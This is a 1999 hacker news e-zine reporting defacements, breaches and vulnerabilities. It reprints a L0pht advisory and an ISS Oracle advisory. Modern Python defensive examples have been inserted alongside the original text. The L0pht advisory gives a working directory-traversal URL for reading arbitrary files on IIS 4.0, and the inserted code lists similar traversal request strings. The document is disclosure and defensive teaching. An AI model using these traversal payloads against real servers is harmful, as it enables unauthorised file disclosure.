The Department of Energy’s home page also had a message that read, “We are Chinese hackers that
takes no cares about politics, but we can not stand by seeing our Chinese reporters been killed.”
The hackers’ own site at killusa.abc.yesite.com, a repository of hacking strategies, had nearly 1,000
messages Sunday, either reporting sites being hacked or expressing anti-American sentiments.
Rumors flew thick and fast, among them that NATO had again bombed the Chinese embassy in
Belgrade and that Chinese President Jiang Zemin had said that China must be prepared to go to war.
Another stated that the intelligence reports provided to NATO prior to the embassy bombing were supplied
by a NATO officer angry with China over its treatment of Tibet.
A contributor to the page also suggests manning a full-scale attack on American Web sites,
disseminating computer viruses, and attacking the sites continuously in a method the hackers term
“machine-gunning.” Another suggests targeting financial sites.



Copyright 1999 ABC News Internet Ventures

-=-

Washington Post;


[Moderator: Mirrors of these hacks can all be found at
http://www.attrition.org/mirror/attrition]


http://www.washingtonpost.com/wp-srv/inatl/longterm/balkans/stories/hackers051299.htm


Anti-NATO Hackers Sabotage 3 Web Sites
By Stephen Barr
Washington Post Staff Writer
Wednesday, May 12, 1999; Page A25


Computer hackers protesting NATO's bombing of the Chinese Embassy in
Belgrade sabotaged three U.S. government Web sites, Clinton administration
officials said yesterday.


The hackers placed anti-NATO messages on Web pages operated by the Energy
Department, the Interior Department and one Interior bureau, the National
Park Service. The cyber-attacks late Sunday forced the Energy Department
and the Park Service to shut down their home pages for much of Monday.


The Interior Department hacker "was traced back to China by DOI computer
experts," said Interior spokesman Tim Ahearn. "The FBI is looking into it
now."


Energy spokeswoman Michelle Del Valle said, "We don't know who did it,"
but she noted that "the hackers claimed in a message that they were
Chinese." She said the DOE has started an investigation.


The officials said the Web pages were pulled off line quickly after the
sabotage was discovered. Electronic firewalls protected other parts of the
departmental computer systems from attack, they said.


Del Valle said hackers placed the following message, with parts in
imperfect English, on the DOE's site:


"Protest U.S.A.'s Nazi action! Protest NATO's brutal action! We are
Chinese hackers who take no cares about politics. But we can not stand by
seeing our Chinese reporters been killed which you might have know.
Whatever the purpose is, NATO led by U.S.A. must take abosolute
responsibility. You have owed Chinese people a bloody debt which you must
pay for. We won't stop attacking until the war stops!"


NATO bombed the Chinese Embassy in Belgrade on Saturday, killing three
people, including at least one journalist. U.S. and NATO officials said
the bombing was an accident caused by reliance on an outdated map.


At Interior, Ahearn said hackers sabotaged the home page about 10 p.m.
Sunday, replacing photographs and information with "pictures of Asian
people and Chinese writing." It took about five hours to take the page off
the Web, restore data and bring it back on line.


Another federal Web site - Recreation.gov - was hit April 30 and was down
until May 3, Ahearn said.


The White House Web site was shut down Monday night after attempts were
made Monday morning to hack into the system. White House spokesman Barry
Toiv said it was shut down through last night to try to determine whether
hackers tampered with the White House computer system. Toiv said he did
not know who was responsible.


-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]


@HWA

05.0 "The Egg" `Cracked'.
~~~~~~~~~~~~~~~~~~~~

The Egg, Cracked

From HNN http://www.hackernews.com/


contributed by Code Kid
A UK internet savings bank known as the Egg, owned by Prudential, was the victim of a security flaw that
allowed some users to see other users' confidential financial information. The article goes on to explain a
classic example of poor implementation. Just because they use encryption does not mean that they are
secure. The bank claims that they have solved the problem.

BBC

http://news.bbc.co.uk/hi/english/business/the_company_file/newsid_337000/337975.stm

Business: The Company File

Crack in Egg's security

It's security, but not as you'd want it

UK Internet savings bank Egg, owned by Prudential, has rushed to close a security flaw that allowed some users
to see other potential savers' confidential financial information.

Egg did not make the security flaw public, but BBC News Online was alerted to the problem by two of its
readers.

One of them called the lack of security "very worrying".

New site with flaws

The fault developed 10 days ago when Egg moved its operations fully to the Internet and relaunched its
Website with new technology.

Several people who tried to apply online for an Egg account, suddenly saw somebody else's application
flash up on the screen - including confidential information like home address, phone numbers, e-mail address,
the amount of money to be invested and other details.

Two shocked customers alerted Egg to the problem, whose IT team then desperately tried to track down the
fault.

Peter Marsden, IT director at Egg, told BBC News Online that the flaw was corrected during the afternoon of
the same day.

Encryption breaches security


Ironically, the problem was triggered by Egg's own security measures. People who try to apply for
an Egg account are asked to log on to the system by identifying themselves with their e-mail address and a
password.

This information is then encrypted and used to 'log the session', i.e. make sure that the computer makes the
right connection between the Internet user and its own electronic records.

However, the new system was not configured to cope with long e-mail addresses. Every e-mail address longer
than about 30 letters was automatically truncated.

Because of the encryption process, people with long, albeit very different e-mail addresses, could end up with
identical IDs.

The flaw became apparent when, for example, mandatory sections in the application form were not filled
in correctly and Egg's web server sent back the page demanding additional information.

At this point, a page containing confidential information could be sent to somebody else with the identical ID.

If hackers had been aware of the security flaw, they could have deliberately flooded Egg's servers, identifying
themselves with long, but false e-mail addresses, hoping to glean personal information of Egg customers.

Egg has now ironed out the problem and changed the system so it can cope with e-mail addresses of any
length.
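The failure the BBC piece describes is a collision in a derived identifier: two very different addresses that share their first 30 or so characters become the same session key, so the server hands one applicant's half-finished form to another. The following is an added example, not Egg's code; it assumes the session ID was derived from the e-mail address alone and uses a SHA-256 digest as a stand-in for the unspecified "encryption". The applicant addresses and form contents are constructed.

```python
import hashlib
import secrets

# The article says addresses longer than "about 30 letters" were cut (assumption: exactly 30).
TRUNCATE_AT = 30

# Constructed applicants: different people whose addresses agree on the first 30 characters.
ALICE = "alice.anderson.longsurname.dept@example-bank-one.example"
BOB = "alice.anderson.longsurname.dept@example-bank-two.example"


def truncated_session_id(email):
    """Flawed derivation modelled on the article: truncate the address, then digest it."""
    return hashlib.sha256(email[:TRUNCATE_AT].lower().encode("utf-8")).hexdigest()


def full_session_id(email):
    """Repaired derivation: every character of the address reaches the digest."""
    return hashlib.sha256(email.lower().encode("utf-8")).hexdigest()


def random_session_id(email):
    """Preferred design: an unguessable token that encodes nothing about the user.

    The address is accepted only so all three functions share one signature."""
    return secrets.token_urlsafe(32)


class ApplicationStore:
    """Server-side table of half-finished applications, keyed by session ID."""

    def __init__(self, id_func):
        self.id_func = id_func
        self.records = {}

    def save(self, email, form):
        """Store the applicant's form under the ID minted for this session."""
        sid = self.id_func(email)
        self.records[sid] = {"email": email, **form}
        return sid

    def resume(self, sid):
        """The page the server sends back when a form needs more information."""
        return self.records.get(sid)


def resume_for_alice(id_func):
    """Both applicants submit; then Alice's browser asks for her page back.

    Returns the record the server would render for Alice's session ID."""
    store = ApplicationStore(id_func)
    alice_sid = store.save(ALICE, {"home_address": "1 First Street", "deposit_gbp": 5000})
    store.save(BOB, {"home_address": "2 Second Road", "deposit_gbp": 250})
    return store.resume(alice_sid)


if __name__ == "__main__":
    for name, func in (("truncated", truncated_session_id),
                       ("full", full_session_id),
                       ("random", random_session_id)):
        print(f"{name:>9}: Alice sees the record of {resume_for_alice(func)['email']}")
```

With the truncating derivation Bob's save overwrites Alice's record under the shared ID, so Alice's next page shows Bob's address and deposit, which is exactly the leak the two readers reported. Hashing the whole address removes that collision, but an ID that is a pure function of the login identity is still guessable by anyone who knows the address; a random token issued per login and stored server-side is the design to prefer.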

Online, and growing

The Egg savings account has been a phenomenal success, exceeding the wildest expectations of parent
company Prudential.

Within six months the company managed to reach its five-year target, with 500,000 customers who have put
£5bn in its accounts.

To help its customers to get online, the Egg has launched a free Internet access service, similar to
Dixon's successful Freeserve.

However, the success has come at a price. The Egg venture is losing millions, and Prudential does not
expect it to make money for some years.

@HWA

06.0 Student changes grades
~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Student Changes Grades


contributed by Weld Pond
An unidentified student of Douglas County High School has admitted to breaking into the school's
computer system and changing the grades of four students. Sgt. Attila Denes, spokesman for the
Douglas County sheriff called their technique "ingenious". Of course the article does not give
any technical details. The student has been suspended for 10 days, may face expulsion and criminal
charges including forgery, use of forged academic records and criminal tampering.

Inside Denver
http://insidedenver.com/news/0507hack1.shtml

Boy admits altering Douglas High grades

By Tillie Fong
Denver Rocky Mountain News Staff Writer


CASTLE ROCK -- Four Douglas County High School students decided
last month they could hack their way into better grades, authorities said
Thursday.

One 16-year-old boy broke into the school's record system and raised
some low marks.

"The technique they used was ingenious," said Sgt. Attila Denes,
spokesman for the Douglas County sheriff.

The hacker figured out a way to get access to records via the school's
library computer and fax machine. He also used commercially available
software to obtain the password.

The boy apparently got into the system at least 30 times starting in
mid-April.

"He changed an average of two to three grades for each student and
changed the failing or near failing grades to A's and B's," Denes said.

On April 30, school employee Joan Elderton noticed that several changes
were made to four students' grades without authorization, and notified
assistant principal Ron England.

Bruce Caughey, spokesman for Douglas County schools, said one of the
things that gave the hacker away was the time and date log the computer
system keeps.

"School officials were able to determine when the changes were made," he
said.

That same day, administrators called in the hacker and his father.

"The student initially denied everything," Denes said.

But the following Monday, he submitted a letter to school officials in which
he admitted making the changes and described how he did it.

At that time, he also said he had altered the grades for three other
students.

"The school administrator subsequently talked to the other three boys, and
they each said that they had asked this other boy to change the grades on
their behalf," Denes said.

Since then, the hacker has been suspended for 10 days, and the other
three students for five days.

They also face criminal charges, and possible expulsion.

Possible charges against the hacker include forgery, use of forged
academic records and criminal tampering.

The other three boys are looking at criminal solicitation and use of forged
academic records charges. None of the boys was named because of their
age.

"The students showed quite a bit of resourcefulness," said Denes. "It's too
bad it couldn't have been channeled more positively."


May 7, 1999

@HWA


07.0 IBM's Gift To Australia's Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

IBM's Gift to Australia's Security


contributed by photon
It is hard to tell if it is the person being written about or the reporter doing the writing but
this "news article" makes it seem that Guy Denton was sent from IBM to save all of Australia from
cyber attacks. A prime example of sensationalistic advertising hiding as "news".

The Sydney Morning Herald
http://www.smh.com.au/news/9905/08/text/national4.html

Hacker tracker plays a risky game

Date: 08/05/99

By JAMES WOODFORD, Science Writer

Guy Denton is the hackers' policeman, the keeper of knowledge so central to our society that should he
change sides he would be one of the most dangerous men on Earth.

His job is to enter other people's computer systems, detect the presence of illegal hackers, prevent
systems from being attacked and to slowly - when students have proven they can be trusted - teach a new
generation of "ethical" hackers how to hunt down bad guys in cyberspace.

An ethical hacker is a computer expert who legally enters clients' computer systems searching for chinks
in security.

Mr Denton said hacking is the "getting of any information that you do not have the right to see".

It is also the wreaking of havoc within computer systems by entering and changing codes so that a company
or bureaucracy's business is disrupted.

Mr Denton, 40, an American, is in Australia to take a new crop of IBM recruits to higher levels of
anti-hacking skills.

The company searches for talented university graduates with the right skills to become professional
ethical hackers with the right psychological makeup to ensure that the skills they are taught are not
misused. Mr Peter Watson, an ethical hacker also with IBM, said: "We tend to stay away from people who
hold themselves out as hackers.

"But we look for certain personality traits - puzzle-solving ability, inquisitiveness - people who are
not comfortable until they have been all the way through something.

"They are people who have got to have the full picture."

They are also young - most, said Mr Watson, were in their mid-20s.

"If you look back through history we have always had things like the Silk Road," Mr Watson said. "They were
always exposed to bandits and pirates and you are really just seeing our trade routes moved to an electronic
basis.

"We are the security guards of the Internet."

The Australian team of ethical hackers - their numbers are a closely guarded secret - work out of a darkened
room on Sydney's Lower North Shore with a bank of computers from where just about any computer system in the
world can be accessed.

Companies concerned about the security of their systems pay a fee of between $15,000 and $40,000 plus costs
to allow the ethical hackers to break into their network.

"In some circumstances they don't tell their computer system administrators that there is a hack going on,"
Mr Denton said.

Once the ethical hackers have entered the system they then wait to see how long it takes for their presence
to be detected or whether once it is detected proper
procedures are followed.

If the "attack" is not detected at all, then advice is given to the client on the installation of a "warning
intrusion alarm system"
or an upgrading of security.

"The level of activity is occurring a lot more," Mr Watson said. "We are starting to see a lot of activity."

Until recently most hacking activity in Australia tended to take place after hours, when people had left work
or university students had finished their day's study.

However, as more people from overseas are realising that Australia is a promising hacking target, the
intrusions are occurring more on a 24-hour basis as people dial
in from places like the United States.

Hackers are able to access a company's computer system by calling in externally and then using programs to
actually enter the systems.

Advice on how to enter computer systems is readily available on the Internet and magazines give tips on how
to enter various systems. Computer hacking programs are also now being sold illegally.

However, in spite of the increasing sophistication being employed by hackers, by far the biggest volume of
intrusions are what are described as "script kiddies".

The greatest fear for the ethical hacker is the anonymous computer whiz or somebody hell bent on mischief
working from within.

"A rogue employee typically does not make themselves known," said Mr Denton.

The ethical hackers acknowledge that their work gives them the power to cause huge problems for society and
have to work ensuring that the staff they train do not cross the line to illegality.

"I could cause a huge amount of chaos," Mr Denton said. "But I am not going to do that.

"We have to be sure that our guys are not going to get bored and do things they are not supposed to do."



@HWA



08.0 SCREAM busted
~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by scream

SCREAM Busted
Last Friday HNN reported that S C R E A M a member of H.A.R.P (Hackers Against Racist
Parties) and well known for his fight against racism and fascism had been apprehended by
law enforcement. HNN has received confirmation of this earlier report. The FBI questioned
SCREAM for 27 hours about 26 different security breaches and his ethics on hate-groups. It
is unknown if he has been charged with a crime.

@HWA


09.0 Corel Hacked
~~~~~~~~~~~~

From http://www.net-security.org/

COREL HACKED
by BHZ, Tuesday 11th May 1999 on 5:10 pm CET
Several of Corel's domains have been compromised by Team Sploit. Hackers convict
NATO attack on Chinese embassy in Belgrade. "whew. when i heard the news about
NATO bombing the Chinese embassy in Serbia, i thought heaven was falling down...
^Oh, sorry, it was a mistake", was the explanation we heard from NATO
spokesmen^". See archive of www.corel.com below

http://www.net-security.org/spec/hack/corel.com.htm

@HWA

10.0 G0at Security calls it quits
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

G0AT QUITS
by BHZ, Tuesday 11th May 1999 on 2:58 pm CET
G0at security is officially finished. They had some problems (including wiping of their
server, fights between members, taking of their EffNet channel #feed-the-goats...).
Their earlier hacks are stored on Attrition mirror. Read finishing statement by Debris
below

///////////////////////////////////////////
GGGGGG OOOOOOO AAAAAAAA TTTTTTTTTT
G O O A A TT
G GGG O O AAAAAAAA TT
G G O O A A TT
GGGGGG OOOOOOO A A TT
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Due to recent events, the downfall of g0at security has become imminent.

These incidents include:

- Legal problems of some of our members.
- Recent hacking crack downs launched by many governments.
- The recent takeover of our channel, #feed-the-goats (Efnet).
- Losing our server due to a sloppy hack by one of our members (/me looks away).
- Losing our text files due to our domain being wiped off the server.
- Fights and disappearances of some of our members.
- The maturing of our members.

g0at security hereby announces its closure. By this we do not mean we are going legit,
we are finished. Unlike other groups we most likely will not spawn back.

[Brief history of g0at security]

One day in Feb. I believe, ech0 and myself (Debris), decided to irc. ech0 informed me that he
occasionally hung out in a channel he, himself created called #feed-the-goats. From there,
members of a popular group, HcV along with members of Global Hell, began coming. ech0 and
myself decided that we wanted to be as elite as our peers in #rootworm, so we made a webpage.
The purpose of the page was to mock and satirize hacker culture in general. Our first document
entitled "g0at declares war on LoU" mocked the Legion of the Underground's new attempt at
becoming legit among a handful of other aspects of their organization.

Our original url (goat.sphix.com) quickly grew in size and popularity, and our channel became
more populated. The hacks began soon after, some by members and a lot by non-members. g0at's
highpoint came soon after the controversial yahoo hack. Our popularity skyrocketed and the
name g0at became known to all (unfortunately we got all the l33t0s in our channel and wouldn't
go away). The fun and games continued up until April, when all the 'incidents' began. Then
May was the last straw.

[Where do we go from here]

Most members will most likely go their own ways. Many still hang in #feed-the-goatz (our new
channel). No more text releases will come from g0at, our webpage will remain down, our archive
on attrition.org will stay the same and nothing will be heard of us as a group.

[Thanks and greets]

Thanks to all that supported our group and enjoyed the text we wrote to amuse the unintelligent.
Greets to all our 12 members, HNN, attrition, net-security, HWA.hax0r.news. JP, for entertaining
us for hours with your hacker journalism. And thanks to all the rest.


Finally.... it's been fun. It's been awesome being associated with g0at.

You can still reach us at g0at@attrition.org for further questions or comments or whatever (I just want email)


g0at---------------------------------------------------------------------------------------------

[]=Debris=[]
debris@attrition.org

@HWA

11.0 Guninski uncovers yet another browser bug
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

ANOTHER BROWSER VULNERABILITY
by BHZ, Tuesday 11th May 1999 on 2:52 pm CET
Georgi Guninski reports another browser bug to BugTraq: "There is a design flaw in
both Internet Explorer 5.0 and Netscape Communicator 4.51 Win95 (guess all 4.x
versions of both browsers are vulnerable too) in the way they handle bookmarks. The
problem arises if the user bookmarks (adds to favorites) and later chooses a specially
designed javascript: URL. When the bookmark is chosen later, the JavaScript code in
it is executed in the context (the same domain and protocol) of the document opened
prior to choosing the bookmark. So, the JavaScript code has access to documents in
the same domain. An interesting case is choosing the bookmark when the active
document is a local file (the protocol is "file:") - then the JavaScript code has access
to local files and directories".
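The bug Guninski describes turns a stored bookmark into a script that runs against whatever document happens to be open, so the defensive question is what a bookmark store should accept in the first place. The following is an added example, not browser code from Netscape, Microsoft or Guninski: it accepts bookmarks by an allowlist of schemes rather than by searching for the string "javascript", and it normalises the input first, because scheme parsers of the era skipped leading whitespace and control characters. The allowlist and the test URLs are assumptions constructed for the example.

```python
from urllib.parse import urlsplit

# Schemes a bookmark store will keep (assumption: a fetchable-document allowlist).
ALLOWED_SCHEMES = {"http", "https", "ftp"}


def bookmark_is_safe(url):
    """True when the URL's scheme is on the allowlist after normalisation.

    Leading/trailing whitespace and ASCII control characters are stripped before
    the scheme is read, so "  JavaScript:" and "java\\tscript:" are both seen as
    javascript: and rejected. A relative entry (no scheme) is rejected too."""
    cleaned = "".join(ch for ch in url.strip() if ord(ch) > 0x1F)
    scheme = urlsplit(cleaned).scheme.lower()
    return scheme in ALLOWED_SCHEMES


def filter_bookmarks(urls):
    """Return the subset of candidate bookmarks the store would keep, in order."""
    return [u for u in urls if bookmark_is_safe(u)]


# Constructed candidates: ordinary sites plus the kinds of entry the check must refuse.
CANDIDATES = [
    "http://www.l0pht.com/",
    "https://www.2600.com/",
    "javascript:void(0)",
    "  JavaScript:void(0)",
    "java\tscript:void(0)",
    "file:///C:/autoexec.bat",
    "www.hackernews.com",
]

if __name__ == "__main__":
    for u in CANDIDATES:
        print(f"{'keep  ' if bookmark_is_safe(u) else 'reject'} {u!r}")
```

The allowlist, not a denylist, is the point: a check that only refuses the literal prefix "javascript:" is defeated by case, by leading whitespace or by a tab inside the scheme name, while an allowlist rejects every unknown scheme by construction. Whether file: should be on the list is a policy choice for the store; it is left off here because the quoted report singles out local files as the worst case.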

@HWA

12.0 Freaky to do a Macintosh related speech at Defcon7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

FREAKY'S DEFCON7 SPEECH
by LucasAr, Tuesday 11th May 1999 on 2:30 pm CET
As you probably know Freaky will be giving a first time ever Macintosh security
related speech on DEFCON7. You can read his announcement and the topics he
plans to address below, and I urge you to visit Freaks Macintosh Archives.
http://freaky.staticusers.net/

Freaks Macintosh Archives Author Freaky will be speaking at this year's Hacker Convention
located in Las Vegas, NV called DefCon 7 <www.defcon.org>

This is the first speech of its kind dealing with the MacOS and its security. We plan on
covering the following topics:
Macintosh Security Products:
OnGuard, FileGuard, Screen 2 Screen, FoolProof, AtEase

Macintosh Underground Products:
Such as programs to destruct a security product or cause another computer to crash (Denial of
Service Attack)

We will also cover how macs are vulnerable to DoS attacks.
And release new programs for the Mac Platforms.

Freaks Macintosh Archives
http://freaky.staticusers.net/

@HWA

13.0 IIS 2.0 "Security" by p0lix
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Originally posted on http://www.403-security.org/

IIS 2.0 "Security"



Microsoft is wrestling with security holes in its Site Server and Internet Information Server (IIS)
products that expose system files -- including potentially sensitive Internet-commerce customer
files or databases -- through any remote web browser.

The flaws, discovered by members of l0pht, are caused by default configurations that install three
active server pages without proper access control list settings.

LOpht has warned that E-commerce server information -- including transaction logs, credit card
numbers, and other customer information -- are potentially at risk.

"There is even E-commerce shopping cart software that stores administrative passwords in simple
text files," LOpht warned.

Using these active server pages -- viewcode.asp, codebrws.asp, and showcode.asp -- someone could
view sensitive or compromising information from that system. The problem affects Versions 3.x of
Site Server and 4.x of IIS; both are used in E-commerce infrastructures.

It's bad if you've got an e-commerce database installed on that system, because almost anyone can
use Active Server Pages to locate databases and get into database information, and you can also
view the source code of HTML pages.

A WebTrends engineer found that the holes were so wide he could use them on an Internet search
engine and determine what servers were similarly configured.

He was able to view the parameters of any file and you can get information that will lead you
through all the systems throughout the network.

Microsoft officials were working on new versions of the tools to correct the vulnerability, which
security product manager Scott Culp said should be complete by early next week, and planned to
issue a security bulletin on the issues Friday afternoon.

In the meantime, potential workarounds include checking the Active Server Pages settings, or
deleting the tools altogether.

As a Web site operator, you want to give customers the opportunity to look at the code on their
page, however, this vulnerability allows somebody to misuse these tools to possibly look at other
files on the server.

For more information visit the l0pht web site at http://www.l0pht.com


-p0liX (p0lix@403-security.org)
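The sample viewers p0lix lists above, and the L0pht advisory reprinted in 14.0 below, come down to one weak access check: the "source" value is accepted whenever it merely contains the string "/msadc/", with no handling of ".." segments. The following is an added example, not Microsoft's or L0pht's code, placing a model of that check beside a hardened one that decodes the value once, canonicalises it and then requires the result to lie below the samples directory. The request strings other than the advisory's own sample path are constructed.

```python
from posixpath import normpath
from urllib.parse import unquote

# The directory the sample viewer was meant to be limited to (path from the advisory).
SAMPLES_ROOT = "/msadc/"


def vulnerable_source_check(source):
    """The check the advisory describes: the value only has to contain '/msadc/' somewhere."""
    return "/msadc/" in source


def hardened_source_check(source):
    """Decode once, canonicalise, then require the path to sit below the samples root."""
    decoded = unquote(source)
    # Anything still percent-encoded after one decode (double encoding), a NUL byte,
    # or a backslash (a second path separator on Windows) is rejected outright.
    if "%" in decoded or "\x00" in decoded or "\\" in decoded:
        return False
    if not decoded.startswith("/"):
        return False
    canonical = normpath(decoded)  # resolves '.', '..' and repeated '/' segments
    return canonical.startswith(SAMPLES_ROOT)


def evaluate(source):
    """Return (vulnerable verdict, hardened verdict) for one 'source=' value."""
    return vulnerable_source_check(source), hardened_source_check(source)


# Constructed requests: the advisory's legitimate sample first, then the ways the
# substring test is satisfied while the canonical path leaves the samples tree.
REQUESTS = [
    "/msadc/Samples/SELECTOR/showcode.asp",
    "/msadc/Samples/../Samples/SELECTOR/showcode.asp",
    "/msadc/../../private/constructed-orders.txt",
    "/msadc/..%2f..%2fprivate/constructed-orders.txt",
    "/elsewhere/msadc/../../private/constructed-orders.txt",
]

if __name__ == "__main__":
    for req in REQUESTS:
        vuln, hard = evaluate(req)
        print(f"substring check: {str(vuln):5}  canonical check: {str(hard):5}  {req}")
```

Every request in the list passes the substring test; only the first two survive canonicalisation, and the second does so because it resolves to the sample file itself. The order of operations matters: decode exactly once, refuse what is still encoded, normalise, and only then compare against the root, since a prefix comparison done before "/../" is resolved is the very check the advisory shows to be empty.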

@HWA

14.0 l0pht Security Advisory on MS IIS 4.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

L0pht Security Advisory


-------------
URL Origin: http://www.l0pht.com/advisories.html
Release Date: May 7th, 1999
Application: Microsoft IIS 4.0 Web Server
Severity: Web users can view ASP source code and other sensitive
files on the web server
Author: weld@l0pht.com
Operating Sys: Microsoft NT Server 4.0
--------------


I. Description


Internet Information Server (IIS) 4.0 ships with a set of sample files
to help web developers learn about Active Server Pages (ASP). One of
these sample files, showcode.asp, is designed to view the source
code of the sample applications via a web browser. The showcode.asp
file does inadequate security checking and allows anyone with a web
browser to view the contents of any text file on the web server. This
includes files that are outside of the document root of the web
server.


Many ecommerce web servers store transaction logs and other customer
information such as credit card numbers, shipping addresses, and
purchase information in text files on the web server. This is the
type of data that could be accessed with this vulnerability.


The L0pht would like to thank Parcens for doing the initial research on
this problem.


II. Details


The showcode.asp file is installed by default at the URL:


http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp


It takes 1 argument in the URL, which is the file to view. The format of
this argument is:


source=/path/filename


So to view the contents of the showcode.asp file itself the URL would be:


http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp


This looks like a fairly dangerous sample file. It can view the contents
of files on the system. The author of the ASP file added a security check
to only allow the viewing of the sample files which were in the '/msadc'
directory on the system. The problem is the security check does not test
for the '..' characters within the URL. The only checking done is if the
URL contains the string '/msadc/'. This allows URLs to be created that
view, not only files outside of the samples directory, but files anywhere
on the entire file system that the web server's document root is on.


For example, a URL that will view the contents of the boot.ini file, which
is in the root directory of an NT system, is:


http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini


This URL requires that IIS 4.0 was installed in its default location.



III. Solution


For production servers, sample files should never be installed, so delete
the entire /msadc/samples directory. If you must have the showcode.asp
capability on development servers, the showcode.asp file should be modified
to test for URLs with '..' in them and deny those requests.
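The two checks side by side, as an added example in Python rather than ASP (this is not L0pht's
code and not Microsoft's showcode.asp; SAMPLES_ROOT and the function names are assumptions for the
illustration). weak_check() is the substring test the advisory describes; hardened_check() denies
'..' segments as the advisory recommends and, going one step further, normalises the path and
confirms it still resolves under the samples directory, so that backslashes, repeated slashes and
case differences (NT file names are case-insensitive) do not slip past either:

```python
# Added example, not code from the L0pht advisory or from Microsoft's showcode.asp.
import posixpath

# The samples directory the advisory names; everything else about the layout is assumed.
SAMPLES_ROOT = "/msadc/Samples"


def weak_check(source):
    """The flawed test: passes as soon as '/msadc/' appears anywhere in the argument."""
    return "/msadc/" in source


def hardened_check(source):
    """Allow only arguments that resolve to a file inside SAMPLES_ROOT.

    `source` is the already URL-decoded value of the source= parameter.
    """
    # NT treats backslash as a path separator and NUL ends a C string; refuse both.
    if "\x00" in source or "\\" in source:
        return False
    # Require an absolute virtual path so normalisation has a fixed starting point.
    if not source.startswith("/"):
        return False
    # What the advisory recommends: deny any '..' segment outright.
    if ".." in source.split("/"):
        return False
    # Collapse '.', '..' and repeated slashes, then compare case-insensitively,
    # because NTFS and FAT file names are case-insensitive.
    resolved = posixpath.normpath(source).lower()
    root = SAMPLES_ROOT.lower()
    return resolved == root or resolved.startswith(root + "/")


def classify(source):
    """Return what each check decides for one source= value."""
    return {"weak": weak_check(source), "hardened": hardened_check(source)}


if __name__ == "__main__":
    for candidate in ("/msadc/Samples/SELECTOR/showcode.asp",
                      "/msadc/Samples/../../../../../boot.ini"):
        print(candidate, classify(candidate))
```

The advisory's own boot.ini URL passes the weak check and fails the hardened one; the legitimate
showcode.asp path passes both.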



For specific questions about this advisory, please contact
weld@l0pht.com


---------------
For more L0pht (that's L - zero - P - H - T) advisories check out:
http://www.l0pht.com/advisories.html
---------------

@HWA

15.0 X-Force Security advisory on Oracle 8: Multiple file system vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ISS Security Advisory
May 6, 1999


Multiple File System Vulnerabilities in Oracle 8


Synopsis:


Internet Security Systems (ISS) X-Force has discovered that multiple
vulnerabilities exist in Oracle 8 that may allow local attackers to exploit
weaknesses in Oracle administrative tools. Oracle is the market leader in
enterprise database solutions. Attackers may use these vulnerabilities to
amplify their privilege to that of the 'oracle' user. By default, the
oracle user controls the entire Oracle database system. Attackers may
launch local denial of service attacks against the database as well as alter
or manipulate data.



Affected Versions:


ISS X-Force has determined that most current versions of Oracle 8 for Unix
are vulnerable. These versions include 8.03, 8.04, 8.05, and 8.15. Oracle
8 for Windows NT is not affected by these vulnerabilities.


Description:


The Oracle 8 distribution is shipped with many administrative utilities that
are owned by the oracle user with the setuid bit enabled. Several of these
utilities implement insecure file creation and manipulation. These
utilities also trust Oracle-related environment variables. The combined
effect of these vulnerabilities may allow local attackers to create, append
to, or overwrite privileged oracle files. Certain vulnerabilities exist
that may allow local attackers to execute arbitrary commands as the oracle
user. Attackers may also be able to permanently elevate their privilege to
that of the oracle user.


Temporary files that follow symbolic links are a common source of
vulnerabilities in setuid executables. Administrators should remove or
restrict access to setuid executables if possible.


Developers of setuid programs need to take special precautions to prevent
the introduction of vulnerabilities of this nature. ISS X-Force recommends
that all Unix developers become familiar with Matt Bishop's secure
programming guide, available at
http://olympus.cs.ucdavis.edu/~bishop/secprog.html
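The temp-file problem the advisory describes, shown as an added Python example (this is not ISS's
or Oracle's code, and the file names are constructed inside a throwaway directory). A privileged
program that opens a predictable temp file with a plain open() writes through any symbolic link
planted at that name; opening with O_CREAT|O_EXCL (plus O_NOFOLLOW where available) refuses to
create the file if anything, link or otherwise, already exists there:

```python
# Added example, not from the ISS advisory or Oracle's tools.
import os
import tempfile


def insecure_append(path, data):
    """The pattern the advisory warns about: open() follows whatever `path` points at."""
    with open(path, "a") as f:
        f.write(data)


def secure_create(path, data):
    """Create-only open: fails if a file or symlink already exists at `path`."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)  # 0600: nobody else can read or write the temp file
    with os.fdopen(fd, "w") as f:
        f.write(data)


def demo():
    """Constructed scenario: a symlink sits where the predictable temp file is expected.

    Returns (contents of the protected file afterwards, what secure_create did).
    """
    with tempfile.TemporaryDirectory() as d:
        protected = os.path.join(d, "protected.cfg")    # stands in for an oracle-owned file
        tmp = os.path.join(d, "predictable.tmp")        # the predictable temp-file name
        with open(protected, "w") as f:
            f.write("original\n")
        os.symlink(protected, tmp)                      # the planted link

        insecure_append(tmp, "injected\n")              # follows the link, alters protected.cfg
        with open(protected) as f:
            after_insecure = f.read()

        try:
            secure_create(tmp, "injected\n")
            outcome = "wrote"
        except OSError:                                 # EEXIST: refuses to go through the link
            outcome = "refused"
        return after_insecure, outcome


if __name__ == "__main__":
    print(demo())
```

Python's tempfile.mkstemp() already uses this flag combination together with an unpredictable
name, which is the combination a setuid program needs: the exclusive create stops link-following,
and the random name stops an attacker from guessing where to plant one.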


Fix Information:


ISS X-Force has worked with Oracle to provide a patch for the
vulnerabilities described in this advisory. Oracle has provided the
following FAQ to answer any questions concerning these vulnerabilities.


